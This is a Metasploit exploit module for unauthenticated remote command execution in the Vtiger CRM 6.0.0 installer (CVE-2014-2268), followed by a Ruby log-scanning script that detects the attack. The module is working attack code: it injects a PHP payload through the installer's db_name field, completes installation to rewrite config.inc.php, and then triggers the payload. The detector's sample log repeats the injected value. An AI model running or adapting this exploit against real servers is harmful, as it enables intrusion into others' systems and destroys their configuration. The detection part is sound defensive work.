Vtiger Install Unauthenticated Remote Command Execution
Source: metasploit.com  Author: Borgeaud  Published: 2014-04-09
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  # Application database configuration is overwritten
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Vtiger Install Unauthenticated Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability in the
        Vtiger install script. This module is set to ManualRanking due to this
        module overwriting the target database configuration, which may result in
        a broken web app, and you may not be able to get a session again.
      },
      'Author'         =>
        [
          'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-2268' ],
          [ 'URL', 'https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html'],
          [ 'URL', 'http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html'],

        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Payload'        =>
        {
          'Space'       => 4000,
          'BadChars'    => "#",
          'DisableNops' => true,
          'Keys'        => ['php']
        },
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Vtiger 6.0.0 or older', { }]],
      'DisclosureDate' => 'Mar 5 2014',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Vtiger', '/'])
        ], self.class)
  end

  def exploit
    print_status("Injecting payload...")
    rand_arg = Rex::Text.rand_text_hex(10)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {'X-Requested-With' => rand_text_alpha(5)},
      'vars_get' => {
          'module'  => 'Install',
          'view'    => 'Index',
          'mode'    => 'Step5',
          'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
      }})

    # Check timeout
    if not res
      print_error("Request timed out, please try again")
      return
    end

    if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
      authkey = $1
      phpsessid = res.get_cookies

      if authkey.blank?
        print_error("No AuthKey found")
        return
      elsif phpsessid.blank?
        print_error("No PHP Session ID found")
        return
      end

      print_status("Retrieved Authkey : #{authkey}")
      print_status("Retrieved PHPSESSID : #{phpsessid}")

      # Step7 completes the installer with the auth_key, which rewrites config.inc.php
      send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, 'index.php'),
        'headers'  => {'X-Requested-With' => rand_text_alpha(5)},
        'cookie'   => phpsessid,
        'vars_get' => {
          'module'   => 'Install',
          'view'     => 'Index',
          'mode'     => 'Step7',
          'auth_key' => authkey
        }
      })

      print_status("Executing payload...")
      send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, 'config.inc.php'),
        'vars_get' => { rand_arg => '1' }
      })
    else
      print_error("No auth_key pattern found")
    end
  end
end
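
As an added, defender-side example that is not part of the Metasploit module above: a small Ruby script that scans web-server access-log lines for the request pattern this module leaves behind (an Install/Step5 request whose db_name carries PHP, the Step7 auth_key request, and config.inc.php fetched directly with a query string). The log lines, client IPs and the `abc` parameter name are constructed for the example.

```ruby
require 'cgi'
require 'uri'

# Constructed sample access-log lines (Apache combined format, abbreviated).
SAMPLE_LOG = <<~'LOG'
  203.0.113.5 - - [09/Apr/2014:10:00:01 +0000] "GET /index.php?module=Home&view=Index HTTP/1.1" 200 5120
  203.0.113.9 - - [09/Apr/2014:10:00:02 +0000] "GET /index.php?module=Install&view=Index&mode=Step5&db_name=127.0.0.1%27%3B+if%28isset%28%24_GET%5B%27abc%27%5D%29%29%7B+echo+1%3B+%7D+%2F%2F+ HTTP/1.1" 200 2048
  203.0.113.9 - - [09/Apr/2014:10:00:03 +0000] "GET /index.php?module=Install&view=Index&mode=Step7&auth_key=deadbeef HTTP/1.1" 200 1024
  203.0.113.9 - - [09/Apr/2014:10:00:04 +0000] "GET /config.inc.php?abc=1 HTTP/1.1" 200 12
LOG

REQUEST_RE = /"(?:GET|POST) (\S+) HTTP/

# Parses each log line into { ip:, path:, params: } with the query string decoded.
def parse_requests(log)
  log.each_line.map do |line|
    next unless (m = REQUEST_RE.match(line))
    uri = URI.parse(m[1])
    params = uri.query ? CGI.parse(uri.query).transform_values(&:first) : {}
    { ip: line.split(' ').first, path: uri.path, params: params }
  end.compact
end

# Returns one finding per suspicious request; a benign request yields nothing.
def detect_vtiger_install_abuse(log)
  parse_requests(log).map do |req|
    path, p = req[:path], req[:params]
    reason =
      if path.end_with?('/index.php') && p['module'] == 'Install'
        # The installer should not be reachable on a deployed instance at all;
        # Step5 with quotes or PHP superglobals in db_name is the CVE-2014-2268 pattern.
        if p['mode'] == 'Step5' && p['db_name'].to_s =~ /['"]|\$_(?:GET|POST|REQUEST)|\bisset\(/
          'install Step5 with PHP injected into db_name'
        else
          'install script still reachable'
        end
      elsif path.end_with?('/config.inc.php') && !p.empty?
        # config.inc.php is an include, never a page; a query string means it is being triggered.
        'config.inc.php requested with query string'
      end
    reason ? { ip: req[:ip], path: path, reason: reason } : nil
  end.compact
end

detect_vtiger_install_abuse(SAMPLE_LOG).each { |f| puts "#{f[:ip]} #{f[:path]}: #{f[:reason]}" }
```

The same three-step sequence from one client within seconds is the strongest signal; a lone "install script still reachable" hit is a hardening finding on its own.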
